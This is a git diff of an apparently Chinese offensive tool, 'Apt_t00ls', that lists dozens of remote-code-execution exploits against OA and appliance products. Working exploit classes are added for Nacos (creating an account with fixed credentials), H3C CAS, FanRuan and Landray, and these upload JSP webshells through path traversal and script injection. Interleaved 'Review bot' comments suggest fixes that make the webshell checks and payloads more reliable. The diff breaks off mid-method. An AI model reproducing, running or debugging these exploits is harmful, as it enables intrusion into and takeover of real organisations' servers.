diff --git a/.DS_Store b/.DS_Store
deleted file mode 100644
index 5fb69aa..0000000
Binary files a/.DS_Store and /dev/null differ
diff --git a/.gitignore b/.gitignore
deleted file mode 100644
index 63a9dff..0000000
--- a/.gitignore
+++ /dev/null
@@ -1,7 +0,0 @@
-#idea
-.idea
-*.iml
-
-
-#maven编译
-target
diff --git a/README.md b/README.md
index f9aff13..14b7fe2 100644
--- a/README.md
+++ b/README.md
@@ -1,12 +1,32 @@
# Apt_t00ls
+
高危漏洞利用工具
+
---
-## 开心指数
+## 贡献者名单
-[](https://starchart.cc/White-hua/Apt_t00ls)
+
---
+
泛微:
e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)
e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)
@@ -15,6 +35,7 @@ e-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)
e-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)
e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)
e-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)
+e-office8 fileupload-RCE (默认写入冰蝎4.0.3aes)
e-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)
e-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)
@@ -22,6 +43,7 @@ e-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)
landray_datajson-RCE (可直接执行系统命令)
landray_treexmlTmpl-RCE (可直接执行系统命令)
landray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)
+landrayoa_fileupload_sysSearch-RCE (默认写入冰蝎4.0.3aes)
用友:
yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)
@@ -29,7 +51,9 @@ yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)
yongyou_NC_bsh.servlet.BshServlet_RCE (可直接执行系统命令)
yongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)
yongyou_GRP_UploadFileData-RCE(默认写入冰蝎4.0.3aes)
-yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)
+yongyou_GRP_AppProxy-RCE(默认写入冰蝎4.0.3aes)
+yongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)
+yongyou_KSOA_Attachmentupload-RCE (默认写入冰蝎4.0.3aes)
万户:
wanhuoa_OfficeServer-RCE(默认写入冰蝎4.0.3aes)
@@ -42,11 +66,16 @@ wanhuoa_fileUploadController-RCE(默认写入冰蝎4.0.3aes)
seeyonoa_main_log4j2-RCE (仅支持检测,自行开启ladp服务利用)
seeyonoa_wpsAssistServlet-RCE(默认写入冰蝎4.0.3aes)
seeyonoa_htmlofficeservlet-RCE(默认写入冰蝎4.0.3aes)
-seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)
+seeyonreport_svg_upload-RCE(默认写入冰蝎4.0.3aes)
+seeyonoa_ajaxBypass-RCE(写入天蝎 密码sky)
+seeyon_testsqli-RCE(仅检测是否存在漏洞页面)
通达:
tongdaoa_getdata-RCE (直接执行系统命令)
-tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)
+tongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)
+
+帆软:
+fanruan_save_svg-RCE (默认写入冰蝎4.0.3aes)
中间件:
IIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)
@@ -54,7 +83,9 @@ IIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)
安全设备:
综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)
网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)
+H3C cas_cvm_upload-RCE (默认写入冰蝎4.0.3aes)
网御星云账号密码泄露
+阿里nacos未授权任意用户添加
使用截图:

@@ -86,8 +117,15 @@ Tasklist敏感进程检测
可直接提Issu
或加我wx进群交流,微信请备注apt
-
+
+
+---
+
+
+## 开心指数
+
+[](https://starchart.cc/White-hua/Apt_t00ls)
---
## 免责声明
本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。
diff --git a/image/I0veD.jpg b/image/I0veD.jpg
new file mode 100644
index 0000000..593457a
Binary files /dev/null and b/image/I0veD.jpg differ
diff --git a/image/luckyh.jpg b/image/luckyh.jpg
new file mode 100644
index 0000000..ba47d78
Binary files /dev/null and b/image/luckyh.jpg differ
diff --git a/src/main/java/Main.java b/src/main/java/Main.java
index 623985b..c775c84 100644
--- a/src/main/java/Main.java
+++ b/src/main/java/Main.java
@@ -1,4 +1,5 @@
import cn.hutool.core.io.resource.ResourceUtil;
+import java.net.URL;
import java.util.Objects;
import javafx.application.Application;
import javafx.fxml.FXMLLoader;
@@ -7,13 +8,14 @@ import javafx.scene.Scene;
import javafx.stage.Stage;
public class Main extends Application {
+ public Main() {
+ }
- @Override
- public void start(Stage primaryStage) throws Exception{
- Parent root = FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
+ public void start(Stage primaryStage) throws Exception {
+ Parent root = (Parent)FXMLLoader.load(ResourceUtil.getResource("fxml/Main.fxml"));
primaryStage.setTitle("APT");
- Scene scene = new Scene(root,1280,910);
- scene.getStylesheets().add(Objects.requireNonNull(Main.class.getResource("/css/main.css")).toExternalForm());
+ Scene scene = new Scene(root, 1280.0, 910.0);
+ scene.getStylesheets().add(((URL)Objects.requireNonNull(Main.class.getResource("/css/main.css"))).toExternalForm());
primaryStage.setScene(scene);
primaryStage.show();
}
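Review bot: The `@Override` annotation on `start` was dropped at L128 while the method still overrides `Application.start`, so a future signature mismatch would silently become an overload instead of a compile error; restore `@Override` above `public void start(Stage primaryStage) throws Exception {`. The explicit no-arg constructor added at L123–L124 and the casts at L129 (`(Parent)`) and L134 (`(URL)`) are redundant — `FXMLLoader.load` is generic and `Objects.requireNonNull` returns its argument's type — and the whole hunk reads like decompiler output replacing hand-written source; if that is what happened, the previous lines were the better version to keep.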
diff --git a/src/main/java/controller/AttController.java b/src/main/java/controller/AttController.java
index 81e862f..8fe2c63 100644
--- a/src/main/java/controller/AttController.java
+++ b/src/main/java/controller/AttController.java
@@ -82,7 +82,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Jsppath);
+ run.exec(shell.open + shell.Jsppath);
} catch (Exception e) {
e.printStackTrace();
}
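Review bot: `run.exec(shell.open + shell.Jsppath)` still uses the single-string `Runtime.exec(String)` overload, which tokenizes the command on whitespace, so a configured path containing a space is split into several arguments and the editor opens the wrong file or nothing; pass the program and the path as separate elements, `run.exec(new String[]{shell.open.trim(), shell.Jsppath});`, or use `ProcessBuilder`. This also assumes `shell.open` already ends with a separator, which cannot be confirmed from this diff — a comment on the field would settle it. The same pattern is repeated in the six hunks that follow, and `e.printStackTrace()` leaves the GUI user with no indication that the launch failed.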
@@ -93,7 +93,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Jspxpath);
+ run.exec(shell.open + shell.Jspxpath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -104,7 +104,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Asppath);
+ run.exec(shell.open + shell.Asppath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -115,7 +115,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Aspxpath);
+ run.exec(shell.open + shell.Aspxpath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -126,7 +126,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.Phppath);
+ run.exec(shell.open + shell.Phppath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -137,7 +137,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.dnspath);
+ run.exec(shell.open + shell.dnspath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -148,7 +148,7 @@ public class AttController {
Runtime run = Runtime.getRuntime();
//path:文件路径
try {
- run.exec("notepad " + shell.dnscofpath);
+ run.exec(shell.open + shell.dnscofpath);
} catch (Exception e) {
e.printStackTrace();
}
@@ -270,60 +270,26 @@ public class AttController {
@FXML
public void initialize() {
- textArea_info.setText(
- "------------------------------------目前EXP如下--------------------------------");
- textArea_info.appendText(
- "\ne-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)");
- textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (默认写入内存马 冰蝎 3.0 beta11)");
- textArea_info.appendText("\ne-cology BshServlet-RCE (可直接执行系统命令)");
- textArea_info.appendText("\ne-cology KtreeUploadAction-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-office doexecl.php-RCE (写入phpinfo,需要getshell请自行利用)");
- textArea_info.appendText("\ne-office10 OfficeServer.php-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-mobile_6.6 messageType.do-SQlli (sqlmap利用,暂无直接shell的exp)");
textArea_info.appendText(
- "\n\nlandray_sysSearchMain-RCE (多个payload,写入哥斯拉 3.03 密码 yes)");
- textArea_info.appendText("\nlandray_treexmlTmpl-RCE (可直接执行系统命令)");
- textArea_info.appendText("\nlandray_datajson-RCE (可直接执行系统命令)");
-
- textArea_info.appendText("\n\nwanhu_OfficeServer-RCE (可直接执行系统命令)");
- textArea_info.appendText("\nwanhu_smartUpload-RCE (可直接执行系统命令)");
- textArea_info.appendText("\nwanhuoa_OfficeServerservlet-RCE(默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nwanhu_DocumentEdit-SQlli (mssql数据库 可 os-shell)");
- textArea_info.appendText("\nwanhuoa_fileUploadController-RCE (默认写入冰蝎4.0.3aes)");
-
- textArea_info.appendText("\ntongdaoa_getdata-RCE (直接执行系统命令)");
- textArea_info.appendText("\ntongdaoa_apiali-RCE (默认写入冰蝎4.0.3aes)");
+ "\n---------------------------(禁止未授权恶意攻击)-------------------------");
textArea_info.appendText(
- "\n\nyongyou_chajet-RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
- textArea_info.appendText("\nyongyou_NC_bsh.servlet.BshServlet-RCE (可直接执行系统命令)");
- textArea_info.appendText(
- "\nyongyou_NC_NCFindWeb 目录遍历漏洞 (可查看是否存在历史遗留webshell)");
- textArea_info.appendText("\nyongyou_NC_FileReceiveServlet-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nyongyou_GRP_UploadFileData-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nyongyou_KSOA_imageUpload-RCE (默认写入冰蝎4.0.3aes)");
-
- textArea_info.appendText("\n\nseeyonoa_main_log4j2-RCE (仅支持检测)");
- textArea_info.appendText("\nseeyonoa_wpsAssistServlet-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nseeyonoa_htmlofficeservlet-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\nseeyonoa_ajaxBypass-RCE (写入天蝎 密码sky)");
+ "\n\n 本工具仅供学习研究及合法授权下渗透测试!!!!!\n");
textArea_info.appendText(
- "\n\nIIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)");
-
- textArea_info.appendText("\n\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
- textArea_info.appendText("\n网康下一代防火墙_ngfw_waf_route-RCE(写入菜刀shell 密码:nishizhu)");
- textArea_info.appendText("\n网御星云-上网行为管理账号密码泄露_Leadsec_ACM");
+ "\n 本工具webshell写入判断依据为md5 在修改shll内容时请勿删除md5");
+ textArea_info.appendText(
+ "\n config目录中shell开头文件均为 冰蝎4.0.3 aes生成webshell");
+ textArea_info.appendText(
+ "\n gsl.jsp为哥斯拉4.01 jsp aes 默认密码密钥 ");
+ textArea_info.appendText(
+ "\n chajet目录下为畅捷通编译好shell文件");
+ textArea_info.appendText(
+ "\n dnslog文件夹下为部分漏洞所需dnslog回显测试所用,请自行修改dnslog文件");
textArea_info.appendText(
- "\n\n-------------------------------(禁止未授权恶意攻击)-----------------------------");
-
- textArea_info.appendText("\n\n---------小提醒,工具所用shell为冰蝎默认aes加密生成shell"
- + "\n 若工具提示shell写入成功 但访问不存在或连接不上 请考虑免杀,修改shell位置在工具目录下Apt_config"
- + "\n 工具判断shell是否写入依据md5 可自行打开查看 修改shell请保留md5 否则会影响漏洞判断");
+ "\n\n---------------------------(禁止未授权恶意攻击)-------------------------");
//设置自动换行
textArea_info.setWrapText(true);
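Review bot: The new banner tells users that a successful write is judged by md5 and that the md5 must be kept when editing a shell (L254), yet the exploit classes added in this commit verify a write with `response.getText().contains(shell.test_payload)`; whether `shell.test_payload` is that md5 is not visible here, so either confirm the two agree or state in the banner exactly which marker must survive an edit. The EXP inventory removed from this method was the only in-app list; the README now carries it, so a one-line pointer to the README would keep that help discoverable. `initialize` continues past the end of the hunk.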
@@ -361,6 +327,9 @@ public class AttController {
case "安全设备":
listview_kinds.setItems(Kinds_Exp.equipment());
break;
+ case "CMS":
+ listview_kinds.setItems(Kinds_Exp.cms());
+ break;
}
updateListView(listview_kinds.getItems().get(0));
}
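Review bot: `updateListView(listview_kinds.getItems().get(0))` at L280 runs unconditionally after the new `"CMS"` case, so if `Kinds_Exp.cms()` ever returns an empty list (its body is not in this diff) the `get(0)` throws `IndexOutOfBoundsException` inside a JavaFX event handler; guard it with `if (!listview_kinds.getItems().isEmpty()) updateListView(listview_kinds.getItems().get(0));`. The enclosing method starts before this hunk.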
@@ -399,18 +368,37 @@ public class AttController {
case "通达-OA":
choiceBox_exp.setItems(exp.tongdaoa());
break;
+ case "帆软-OA":
+ choiceBox_exp.setItems(exp.fanruan());
+ break;
+
case "IIS":
choiceBox_exp.setItems(exp.iis());
break;
+
+
+
case "海康":
choiceBox_exp.setItems(exp.hik());
break;
+ case "H3C":
+ choiceBox_exp.setItems(exp.h3c());
+ break;
case "奇安信":
choiceBox_exp.setItems(exp.qianxin());
break;
case "网御星云":
choiceBox_exp.setItems(exp.wangyu());
break;
+
+
+
+ case "Alibaba":
+ choiceBox_exp.setItems(exp.Alibaba());
+ break;
+
+
+
default:
System.out.println(selectedItem);
// 当所选项还没有exp给默认选项
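Review bot: The new `case "Alibaba":` calls `exp.Alibaba()` at L312, a capitalized method name that breaks the lower-case convention of the neighbouring `exp.fanruan()`, `exp.h3c()` and `exp.tongdaoa()`; rename it `exp.alibaba()` (and its definition, which is outside this diff) for consistency. The runs of blank lines inserted at L289, L293–L295, L308–L310 and L314–L316 carry no meaning inside a `switch` and should be dropped. The enclosing method starts and ends outside the hunk.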
diff --git a/src/main/java/controller/TsklistController.java b/src/main/java/controller/TsklistController.java
index e5acd40..be5d460 100644
--- a/src/main/java/controller/TsklistController.java
+++ b/src/main/java/controller/TsklistController.java
@@ -34,7 +34,7 @@ public class TsklistController {
String finallist = shell.ifexe(resultlist22, exelist);
String res;
try {
- res = new String(finallist.getBytes("gbk"));
+ res = new String(finallist.getBytes("utf-8"));
textArea_res.setText(res);
} catch (UnsupportedEncodingException e) {
e.printStackTrace();
diff --git a/src/main/java/exp/cms/nacos_Creatuser.java b/src/main/java/exp/cms/nacos_Creatuser.java
new file mode 100644
index 0000000..f8079bf
--- /dev/null
+++ b/src/main/java/exp/cms/nacos_Creatuser.java
@@ -0,0 +1,47 @@
+package exp.cms;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class nacos_Creatuser implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 该漏洞无法getshell");
+ });
+ return false;
+ }
+
+ private boolean att(String url , TextArea textArea){
+ HashMap head = new HashMap();
+ head.put("User-Agent","Nacos-Server");
+ String poststring = "";
+ Response post = HttpTools.post(url + "/nacos/v1/auth/users?username=nishizhu&password=zhu@123", poststring, head, "utf-8");
+
+ if(post.getCode() == 200 && post.getText().contains("create user ok")){
+ Platform.runLater(() -> {
+ textArea.appendText("\n nacos任意用户添加漏洞存在 用户添加成功,账号:nishizhu 密码:zhu@123");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n nacos任意用户添加-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+
+
+
+}
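Review bot: `att` creates a persistent account on the target with the fixed credentials `nishizhu` / `zhu@123` (L367) as a side effect of a *check*, and those credentials ship in every copy of this tool, so any third party who knows them can log into every Nacos instance this check has been run against; generate them per run, e.g. `String user = "u" + shell.getRandomString();` with a random password, and print them so the tester can delete the account afterwards. Putting the account creation in `checkVul` also means a user who only wants detection still modifies the target, which differs from the other classes where `checkVul` writes a harmless marker; at minimum the success message should say that cleanup is required. The `User-Agent: Nacos-Server` header is the whole bypass here, so a one-line comment saying why it is sent would help the next maintainer.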
diff --git a/src/main/java/exp/equipment/Sangfor/ad_passwd.java b/src/main/java/exp/equipment/Sangfor/ad_passwd.java
new file mode 100644
index 0000000..7b316e5
--- /dev/null
+++ b/src/main/java/exp/equipment/Sangfor/ad_passwd.java
@@ -0,0 +1,27 @@
+package exp.equipment.Sangfor;
+
+import cn.hutool.http.HttpRequest;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+
+import java.util.HashMap;
+
+public class ad_passwd implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return null;
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return null;
+ }
+
+ private Boolean att(String url, TextArea textArea){
+ Response response = HttpTools.get(url, new HashMap(), "utf-8");
+ return false;
+ }
+}
+
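Review bot: `checkVul` and `getshell` return `null` (L405, L410), so any caller that writes `if (exploit.checkVul(url, textArea))` throws `NullPointerException` on unboxing the moment this entry is selected in the UI; until the exploit is implemented they should return `false` and post a "not implemented" message, the way `seeyon_testsqli.getshell` handles its unsupported case. `att` is never called and the `cn.hutool.http.HttpRequest` import at L394 is unused. If this stub is not yet wired into the exploit lists, it is better left out of the commit than shipped as a live menu item that crashes.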
diff --git a/src/main/java/exp/equipment/h3c/cas_cvm_upload.java b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
new file mode 100644
index 0000000..4d66daf
--- /dev/null
+++ b/src/main/java/exp/equipment/h3c/cas_cvm_upload.java
@@ -0,0 +1,76 @@
+package exp.equipment.h3c;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class cas_cvm_upload implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private boolean att(String url,TextArea textArea){
+ String payload = shell.readFile(shell.Testpath);
+
+ HashMap head = new HashMap<>();
+ head.put("Content-range","bytes 0-10/20");
+ head.put("Accept-Encoding","gzip, deflate");
+ head.put("Content-type","");
+
+ Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.txt&name=222", payload, head, "utf-8");
+
+ Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在 测试文件写入成功 \n " + url + "/cas/js/lib/buttons/nishizhu.txt"
+ );
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n cas_cvm云计算管理平台-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+ private boolean shell(String url,TextArea textArea){
+ String payload = shell.readFile(shell.Jsppath);
+
+ HashMap head = new HashMap<>();
+ head.put("Content-range","bytes 0-10/20");
+ head.put("Accept-Encoding","gzip, deflate");
+ head.put("Content-type","");
+
+ Response post = HttpTools.post(url + "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/nishizhu.jsp&name=222", payload, head, "utf-8");
+
+ Response response = HttpTools.get(url + "/cas/js/lib/buttons/nishizhu.txt", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText(
+ "\n 漏洞存在 webshell文件写入成功 \n " + url + "/cas/js/lib/buttons/nishizhu.jsp"
+ );
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }
+
+
+}
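Review bot: `shell` uploads `nishizhu.jsp` (L481) but then fetches `/cas/js/lib/buttons/nishizhu.txt` (L483) and looks for `shell.test_payload`, so it re-verifies the artifact left by `att` rather than the webshell and reports "webshell文件写入成功" whenever the earlier check file still exists, even if the JSP upload was blocked; change L483 to `url + "/cas/js/lib/buttons/nishizhu.jsp"`. The success criterion for an executed JSP presumably differs from the plain-text marker — the template at `shell.Jsppath` is not in this diff, so confirm what the served page actually contains. The traversal hard-codes `/var/lib/tomcat8/webapps/cas/` (L455, L481), which misses installs with a different Tomcat root, and the empty `Content-type` plus the `Content-range: bytes 0-10/20` header are sent without explanation; a one-line comment on why the server needs them would help the next maintainer.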
diff --git a/src/main/java/exp/oa/fanruan/fanruan_save_svg.java b/src/main/java/exp/oa/fanruan/fanruan_save_svg.java
new file mode 100644
index 0000000..3d7f5dc
--- /dev/null
+++ b/src/main/java/exp/oa/fanruan/fanruan_save_svg.java
@@ -0,0 +1,77 @@
+package exp.oa.fanruan;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class fanruan_save_svg implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ return att(url, textArea);
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url, textArea);
+ }
+
+ private Boolean att(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "text/xml;charset=UTF-8");
+ String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Testpath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+ Response post = HttpTools.post(url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/nishizhu.svg.jsp", payload, head, "utf-8");
+
+ if(post.getCode() == 200){
+ Response response = HttpTools.get(url + "/WebReport/nishizhu.svg.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 测试文件写入成功\n " + url + "/nishizhu.svg.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n fanruan-design_save_svg-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+ private Boolean shell(String url, TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type", "text/xml;charset=UTF-8");
+ String payload = "{\"__CONTENT__\": \"" + shell.readFile(shell.Jsppath).replace("\"","\\\"") + "\", \"__CHARSET__\": \"UTF-8\"}";
+ Response post = HttpTools.post(url + "/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/nishidazhu.svg.jsp", payload, head, "utf-8");
+
+ if(post.getCode() == 200){
+ Response response = HttpTools.get(url + "/WebReport/nishizhu.svg.jsp", new HashMap(), "utf-8");
+ if (response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 webshell文件写入成功\n " + url + "/nishidazhu.svg.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n 疑似杀软查杀 请手动复现");
+ });
+ return false;
+ }
+ }
+
+}
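Review bot: `shell` writes `nishidazhu.svg.jsp` (L560) but verifies `nishizhu.svg.jsp` (L563), the file created by `att`, so a successful-looking getshell result only proves the earlier check file is still there; change L563 to `url + "/WebReport/nishidazhu.svg.jsp"`. The URL printed on success at L539 also drops the `/WebReport/` segment that L536 actually requested. The JSON body is assembled by string concatenation with only `"` escaped (L532, L559); a backslash or a line break in the JSP template produces invalid JSON, so escape `\\` and control characters too, or build the body with a JSON library. The `else` branch at L575–L579 prints "疑似杀软查杀" for any non-200 response, which conflates "not vulnerable" with "blocked" and disagrees with the wording `att` uses for the same case.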
diff --git a/src/main/java/exp/oa/landrayoa/landray_datajson.java b/src/main/java/exp/oa/landrayoa/landray_datajson.java
index fb0b38e..2f80969 100644
--- a/src/main/java/exp/oa/landrayoa/landray_datajson.java
+++ b/src/main/java/exp/oa/landrayoa/landray_datajson.java
@@ -1,9 +1,7 @@
package exp.oa.landrayoa;
import core.Exploitlnterface;
-
import java.util.HashMap;
-
import javafx.application.Platform;
import javafx.scene.control.TextArea;
import utils.HttpTools;
@@ -29,7 +27,7 @@ public class landray_datajson implements Exploitlnterface {
shell.readFile(shell.dnspath).replace("http://", "");
String payload = "/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function%20test()%7B%20return%20java.lang.Runtime%7D;r=test();r.getRuntime().exec(%22ping%20-c%204%20" + shell.getRandomString() + "." + dnslog + "%22)&type=1";
Response response = HttpTools.get(url + payload, new HashMap(), "utf-8");
- if (response.getCode() == 200 && response.getText().contains("success")) {
+ if (response.getCode() == 200 && response.getText().contains("模拟通过")) {
Platform.runLater(() -> {
textArea.appendText("\n漏洞存在 请自行利用\n" + url + payload);
});
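Review bot: The success test now matches the Chinese UI string `"模拟通过"` (L602), so it depends on the response being decoded as UTF-8 — `HttpTools.get` is called with `"utf-8"` at L600, but if the OA answers in GBK the match fails and the check reports "not vulnerable" even though the ping payload ran; consider matching a charset-neutral token or decoding with the charset from the response `Content-Type`. The statement at L598, `shell.readFile(shell.dnspath).replace("http://", "");`, discards its result (the `dnslog` used at L599 must be assigned above the hunk), so it looks like a leftover and should be removed. The enclosing method starts and ends outside the hunk.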
diff --git a/src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java b/src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java
new file mode 100644
index 0000000..3876513
--- /dev/null
+++ b/src/main/java/exp/oa/landrayoa/landray_fileupload_sysSearch.java
@@ -0,0 +1,75 @@
+package exp.oa.landrayoa;
+
+import core.Exploitlnterface;
+import javafx.application.Platform;
+import javafx.scene.control.TextArea;
+import sun.misc.BASE64Encoder;
+import utils.HttpTools;
+import utils.Response;
+import utils.shell;
+
+import java.util.HashMap;
+
+public class landray_fileupload_sysSearch implements Exploitlnterface {
+
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ Boolean att = att(url, textArea);
+ return att;
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return shell(url,textArea);
+ }
+
+ private Boolean att(String url,TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","application/x-www-form-urlencoded");
+
+ String ok_result = (new BASE64Encoder()).encodeBuffer(shell.readFile(shell.Testpath).getBytes()).trim();
+ String t1 = shell.gbEncoding("import java.lang.*;import java.io.*;Class cls=Thread.currentThread().getContextClassLoader().loadClass(\"bsh.Interpreter\");String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File f=new File(path.split(\"WEB-INF\")[0]+\"/loginzhu.jsp\");f.createNewFile();FileOutputStream fout=new FileOutputStream(f);fout.write(new sun.misc.BASE64Decoder().decodeBuffer(\"" + ok_result + "\"));fout.close()");
+ String payload = "var={\"body\":{\"file\":\"/sys/search/sys_search_main/sysSearchMain.do?method=editParam\"}}&fdParemNames=12&fdParameters="+ t1 +"";
+
+ Response post = HttpTools.post(url + "/sys/ui/extend/varkind/custom.jsp", payload, head, "utf-8");
+ Response response = HttpTools.get(url + "/loginzhu.jsp", new HashMap(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains(shell.test_payload)){
+ Platform.runLater(() -> {
+ textArea.appendText("\n 漏洞存在 测试文件写入成功 \n " + url + "/loginzhu.jsp");
+ });
+ return true;
+ }else {
+ Platform.runLater(() -> {
+ textArea.appendText("\n landrayoa_fileupload_sysSearch-RCE-漏洞不存在 (出现误报请联系作者)");
+ });
+ return false;
+ }
+ }
+
+
+ private Boolean shell(String url,TextArea textArea){
+ HashMap head = new HashMap<>();
+ head.put("Content-Type","application/x-www-form-urlencoded");
+
+ String rdf = shell.readFile(shell.Jsppath).trim();
+ String ok_result = (new BASE64Encoder()).encodeBuffer(rdf.getBytes());
